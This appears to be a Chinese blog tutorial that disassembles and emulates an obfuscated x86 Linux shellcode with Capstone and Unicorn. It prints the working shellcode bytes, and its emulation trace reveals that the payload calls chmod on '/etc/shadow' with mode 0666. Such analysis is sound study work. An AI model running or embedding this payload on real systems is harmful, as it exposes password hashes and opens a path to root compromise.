练习使用Unicorn、Capstone
Unicorn是一个轻量级的多平台,多体系结构的CPU仿真器框架。官网:http://www.unicorn-engine.org/
Capstone是一个轻量级的多平台,多体系结构的反汇编框架。官网:http://www.capstone-engine.org/
参考:https://bbs.pediy.com/thread-224330.htm
练习:分析混淆的shllcode
shellcode=b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
使用capstone反汇编:
from capstone import*
md=Cs(CS_ARCH_X86,CS_MODE_32)//初始化,指定处理器架构
shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
for code in md.disasm(shellcode,0x0):
print("0x%x:\t%s\t%s"%(code.address,code.mnemonic,code.op_str))
反汇编结果:
0x0: call 4
0x5: rcr byte ptr [ebp + 0x6a], 5
0x9: pop ebx
0xa: sub ebp, ebx
0xc: add ebp, 0x4e
0xf: mov ecx, ebp
0x11: push 2
0x13: add ecx, dword ptr [esp]
0x16: pop ebx
0x17: xor edx, edx
0x19: mov dx, 0x12
0x1d: mov edi, dword ptr [ecx]
0x1f: shl edi, 0x10
0x22: shr edi, 0x10
0x25: sub ecx, 0xfffffffe
0x2b: mov eax, dword ptr [ebp]
0x2e: shl eax, 0x10
0x31: shr eax, 0x10
0x34: mov ebx, eax
0x36: or ebx, edi
0x38: and eax, edi
0x3a: not eax
0x3c: and eax, ebx
0x3e: mov word ptr [ebp], ax
0x42: add ebp, 2
0x45: dec edx
0x46: test edx, edx
0x48: jne 0x1d
0x4e: in al, dx
0x4f: aaa
0x50: jne 0xaf
0x52: jp 0x59
0x54: sub ch, ch
0x56: and al, 0xed
0x58: and al, 0xed
0x5a: or ecx, dword ptr [eax - 0x67af1481]
0x60: cmp cl, bh
0x62: pop esp
0x63: xchg eax, esi
0x64: sub edx, dword ptr [esi - 0x390190]
下面使用unicorn模拟执行
from unicorn import *
from unicorn.x86_const import *
from capstone import*
md=Cs(CS_ARCH_X86,CS_MODE_32)#初始化反汇编
BASE = 0x400000
STACK_ADDR = 0x0
STACK_SIZE = 1024 * 1024
mu = Uc(UC_ARCH_X86, UC_MODE_32)#初始化
mu.mem_map(BASE, 1024 * 1024)#开辟模拟运行的映射空间
mu.mem_map(STACK_ADDR, STACK_SIZE)#栈空间
shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
mu.mem_write(BASE, shellcode)//载入需模拟的代码指令
mu.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE // 2)#设置栈指针
def syscall_num_to_name(num):
syscalls = {1: "sys_exit", 15: "sys_chmod"}
return syscalls[num]
def hook_code(mu, address, size, user_data):#hook代码
# print('>>> Tracing instruction at 0x%x, instruction size = 0x%x' %(address, size))
machine\_code = mu.mem\_read(address, size)
for code in md.disasm(machine\_code,address):
print(" 0x%x:\\t%s\\t%s" % (code.address, code.mnemonic, code.op\_str))
if machine\_code == b"\\xcd\\x80":
r\_eax = mu.reg\_read(UC\_X86\_REG\_EAX)
r\_ebx = mu.reg\_read(UC\_X86\_REG\_EBX)
r\_ecx = mu.reg\_read(UC\_X86\_REG\_ECX)
r\_edx = mu.reg\_read(UC\_X86\_REG\_EDX)
syscall\_name = syscall\_num\_to\_name(r\_eax)
print("--------------")
print("We intercepted system call: " + syscall\_name)
if syscall\_name == "sys\_chmod":
s = mu.mem\_read(r\_ebx, 20).split(b"\\x00")\[0\]
print("arg0 = 0x%x -> %s" % (r\_ebx, s))
print("arg1 = " + oct(r\_ecx))
elif syscall\_name == "sys\_exit":
print("arg0 = " + hex(r\_ebx))
exit()
mu.reg\_write(UC\_X86\_REG\_EIP, address + size)mu.hook_add(UC_HOOK_CODE, hook_code)//添加hook函数,每条指令执行前都先调用hook函数
mu.emu_start(BASE, BASE - 1)//开始执行
执行结果:
0x400000: call 0x400004
0x400004: inc eax
0x400006: pop ebp
0x400007: push 5
0x400009: pop ebx
0x40000a: sub ebp, ebx
0x40000c: add ebp, 0x4e
0x40000f: mov ecx, ebp
0x400011: push 2
0x400013: add ecx, dword ptr \[esp\]
0x400016: pop ebx
0x400017: xor edx, edx
0x400019: mov dx, 0x12
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40001d: mov edi, dword ptr \[ecx\]
0x40001f: shl edi, 0x10
0x400022: shr edi, 0x10
0x400025: sub ecx, 0xfffffffe
0x40002b: mov eax, dword ptr \[ebp\]
0x40002e: shl eax, 0x10
0x400031: shr eax, 0x10
0x400034: mov ebx, eax
0x400036: or ebx, edi
0x400038: and eax, edi
0x40003a: not eax
0x40003c: and eax, ebx
0x40003e: mov word ptr \[ebp\], ax
0x400042: add ebp, 2
0x400045: dec edx
0x400046: test edx, edx
0x400048: jne 0x40001d
0x40004e: cdq
0x40004f: push 0xf
0x400051: pop eax
0x400052: push edx
0x400053: call 0x400064
0x400064: pop ebx
0x400065: push 0x1b6
0x40006a: pop ecx 0x40006b: int 0x80
We intercepted system call: sys_chmod
arg0 = 0x400058 -> bytearray(b'/etc/shadow')
arg1 = 0o666
0x40006d: push 1
0x40006f: pop eax
0x400070: int 0x80
We intercepted system call: sys_exit
arg0 = 0x400058
手机扫一扫
移动阅读更方便
你可能感兴趣的文章